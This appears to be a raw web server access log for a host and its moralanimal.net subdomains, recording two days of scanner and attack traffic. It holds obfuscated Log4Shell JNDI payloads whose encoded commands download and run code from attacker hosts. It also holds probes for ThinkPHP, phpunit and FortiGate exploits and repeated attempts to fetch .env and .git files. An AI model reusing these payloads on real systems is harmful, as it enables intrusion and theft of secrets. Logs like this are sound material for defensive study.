https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Jan/2022:07:03:57 +0000] 444 - HEAD https 64.22.31.253 "/epa/scripts/win/nsepa_setup.exe" [Client 44.234.121.239] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [01/Jan/2022:08:20:02 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.9] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [01/Jan/2022:08:43:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Jan/2022:08:47:59 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.136] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Jan/2022:08:55:58 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.202.187] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Jan/2022:09:28:34 +0000] 400 - POST http localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [01/Jan/2022:09:42:07 +0000] 444 - GET https agent.moralanimal.net "/" [Client 92.118.160.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [01/Jan/2022:10:27:49 +0000] 444 - GET https 64.22.31.253 "/UI/Dashboard" [Client 92.118.160.17] [Length 0] [Gzip -] "Go http package" "-" [01/Jan/2022:10:33:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Jan/2022:11:03:14 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [01/Jan/2022:11:47:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Jan/2022:12:11:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 92.118.160.45] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [01/Jan/2022:12:20:44 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.195.189] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Jan/2022:13:09:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.57] [Length 0] [Gzip -] "-" "-" [01/Jan/2022:13:09:04 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.57] [Length 252] [Gzip -] "-" "-" [01/Jan/2022:13:09:04 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [01/Jan/2022:14:20:06 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 54.176.2.69] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [01/Jan/2022:14:58:45 +0000] 444 - GET https 64.22.31.253 "/cgi-bin/config.exp" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Jan/2022:15:42:43 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 92.118.160.61] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [01/Jan/2022:16:43:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 182.161.66.103] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36" "-" [01/Jan/2022:17:30:45 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [01/Jan/2022:17:31:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.207.115] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Jan/2022:17:32:02 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 178.239.21.103] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.36.2.el7.x86_64" "-" [01/Jan/2022:17:43:59 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [01/Jan/2022:17:52:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Jan/2022:18:00:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [01/Jan/2022:18:50:51 +0000] 444 - GET https pop.moralanimal.net "/" [Client 92.118.160.45] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [01/Jan/2022:19:43:43 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [01/Jan/2022:19:43:43 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [01/Jan/2022:19:43:43 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [01/Jan/2022:21:03:13 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Jan/2022:21:03:14 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Jan/2022:21:23:53 +0000] 400 - GET http localhost "/admin/config.php" [Client 2.57.121.38] [Length 252] [Gzip -] "gbrmss/7.29.0" "-" [01/Jan/2022:21:40:50 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 198.199.95.200] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Jan/2022:21:42:49 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.211.160] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Jan/2022:21:43:23 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.209.65] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Jan/2022:21:50:12 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Jan/2022:21:54:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.43] [Length 0] [Gzip -] "-" "-" [01/Jan/2022:21:54:33 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.43] [Length 252] [Gzip -] "-" "-" [01/Jan/2022:22:50:46 +0000] 444 - GET https 64.22.31.253 "/Telerik.Web.UI.WebResource.axd?type=rau" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Jan/2022:22:53:13 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Jan/2022:23:44:35 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [01/Jan/2022:23:44:35 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [01/Jan/2022:23:44:35 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [02/Jan/2022:00:07:51 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Jan/2022:00:10:25 +0000] 400 - POST http 64.22.31.253 "/" [Client 156.146.50.141] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "-" [02/Jan/2022:00:40:13 +0000] 444 - GET https 64.22.31.253 "/remote/login" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Jan/2022:01:00:54 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [02/Jan/2022:01:01:56 +0000] 444 - GET https admin.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:56 +0000] 444 - GET https backend.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:56 +0000] 444 - GET https web.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:56 +0000] 444 - GET https portal.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:56 +0000] 444 - GET https support.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:56 +0000] 444 - GET https laravel.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:56 +0000] 444 - GET https cms.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:56 +0000] 444 - GET https test.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:56 +0000] 444 - GET https beta.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:56 +0000] 444 - GET https staging.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:56 +0000] 444 - GET https new.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:56 +0000] 444 - GET https panel.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:56 +0000] 444 - GET https app.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:56 +0000] 444 - GET https stage.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:57 +0000] 444 - GET https apps.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:57 +0000] 444 - GET https testing.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:57 +0000] 444 - GET https dev.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:57 +0000] 444 - GET https demo.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:01:58 +0000] 444 - GET https api.moralanimal.net "/.env" [Client 185.225.39.205] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:01:11:33 +0000] 400 - POST http 64.22.31.253 "/27383555" [Client 194.110.115.2] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36" "-" [02/Jan/2022:01:42:51 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Jan/2022:02:28:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.172.16] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [02/Jan/2022:02:28:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.172.16] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [02/Jan/2022:02:28:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.172.16] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [02/Jan/2022:02:29:14 +0000] 400 - - https localhost "-" [Client 89.248.172.16] [Length 0] [Gzip -] "-" "-" [02/Jan/2022:02:29:14 +0000] 400 - - https localhost "-" [Client 89.248.172.16] [Length 0] [Gzip -] "-" "-" [02/Jan/2022:02:29:17 +0000] 400 - - https localhost "-" [Client 89.248.172.16] [Length 0] [Gzip -] "-" "-" [02/Jan/2022:02:29:28 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 89.248.172.16] [Length 0] [Gzip -] "-" "-" [02/Jan/2022:02:29:30 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 89.248.172.16] [Length 0] [Gzip -] "-" "-" [02/Jan/2022:02:29:34 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 89.248.172.16] [Length 0] [Gzip -] "-" "-" [02/Jan/2022:02:30:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [02/Jan/2022:02:33:11 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:02:33:11 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:03:42:05 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Jan/2022:03:51:25 +0000] 400 - GET http 64.22.31.253 "/" [Client 199.127.60.104] [Length 252] [Gzip -] "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3N0YXI7IGN1cmwgLU8gaHR0cDovLzIuNTguMTQ5LjIwNi9yc3RhcjsgY2htb2QgNzc3IHN0YXI7IC4vc3RhciBleHBsb2l0}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3N0YXI7IGN1cmwgLU8gaHR0cDovLzIuNTguMTQ5LjIwNi9yc3RhcjsgY2htb2QgNzc3IHN0YXI7IC4vc3RhciBleHBsb2l0}')" [02/Jan/2022:04:15:03 +0000] 444 - GET https 64.22.31.253 "/.git/HEAD" [Client 18.236.73.186] [Length 0] [Gzip -] "Python-urllib/3.6" "-" [02/Jan/2022:04:15:09 +0000] 444 - GET https 64.22.31.253 "/.git/HEAD" [Client 18.236.73.186] [Length 0] [Gzip -] "Python-urllib/3.6" "-" [02/Jan/2022:04:30:37 +0000] 400 - GET http 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:04:30:37 +0000] 444 - GET https 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:04:33:40 +0000] 444 - GET https 64.22.31.253 "/.git/HEAD" [Client 54.211.6.227] [Length 0] [Gzip -] "Python-urllib/3.6" "-" [02/Jan/2022:04:44:16 +0000] 400 - GET http 64.22.31.253 "/" [Client 45.83.64.153] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [02/Jan/2022:04:44:16 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 45.83.64.194] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [02/Jan/2022:04:46:50 +0000] 444 - POST https 64.22.31.253 "/" [Client 185.215.164.39] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Jan/2022:04:55:02 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 92.118.160.9] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [02/Jan/2022:05:02:11 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [02/Jan/2022:05:07:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Jan/2022:05:20:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Jan/2022:06:03:43 +0000] 400 - POST http localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [02/Jan/2022:06:09:01 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [02/Jan/2022:06:09:01 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [02/Jan/2022:06:11:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [02/Jan/2022:06:11:40 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [02/Jan/2022:06:25:38 +0000] 444 - GET https 64.22.31.253 "/.git/HEAD" [Client 18.236.73.186] [Length 0] [Gzip -] "Python-urllib/3.6" "-" [02/Jan/2022:06:25:49 +0000] 444 - GET https 64.22.31.253 "/.git/HEAD" [Client 18.236.73.186] [Length 0] [Gzip -] "Python-urllib/3.6" "-" [02/Jan/2022:06:26:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Jan/2022:06:41:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.60] [Length 0] [Gzip -] "-" "-" [02/Jan/2022:06:41:09 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.60] [Length 252] [Gzip -] "-" "-" [02/Jan/2022:06:41:09 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [02/Jan/2022:06:44:43 +0000] 444 - GET https 64.22.31.253 "/.git/HEAD" [Client 54.211.6.227] [Length 0] [Gzip -] "Python-urllib/3.6" "-" [02/Jan/2022:07:21:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Jan/2022:08:41:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.99.255.54] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [02/Jan/2022:08:57:21 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 198.199.94.6] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Jan/2022:09:06:03 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.214.199] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Jan/2022:09:35:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 221.226.159.22] [Length 0] [Gzip -] "curl/7.58.0" "-" [02/Jan/2022:09:35:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 221.226.159.22] [Length 0] [Gzip -] "curl/7.58.0" "-" [02/Jan/2022:09:35:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 221.226.159.22] [Length 0] [Gzip -] "curl/7.58.0" "-" [02/Jan/2022:09:35:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 221.226.159.22] [Length 0] [Gzip -] "curl/7.58.0" "-" [02/Jan/2022:09:46:05 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 92.118.160.9] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [02/Jan/2022:10:09:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.129.56.200] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [02/Jan/2022:10:09:42 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 45.129.56.200] [Length 0] [Gzip -] "-" "-" [02/Jan/2022:10:09:44 +0000] 400 - - http localhost "-" [Client 45.129.56.200] [Length 154] [Gzip -] "-" "-" [02/Jan/2022:10:09:45 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.100.242] [Length 0] [Gzip -] "-" "-" [02/Jan/2022:10:09:52 +0000] 400 - - http localhost "-" [Client 45.129.56.200] [Length 154] [Gzip -] "-" "-" [02/Jan/2022:10:56:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Jan/2022:12:24:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 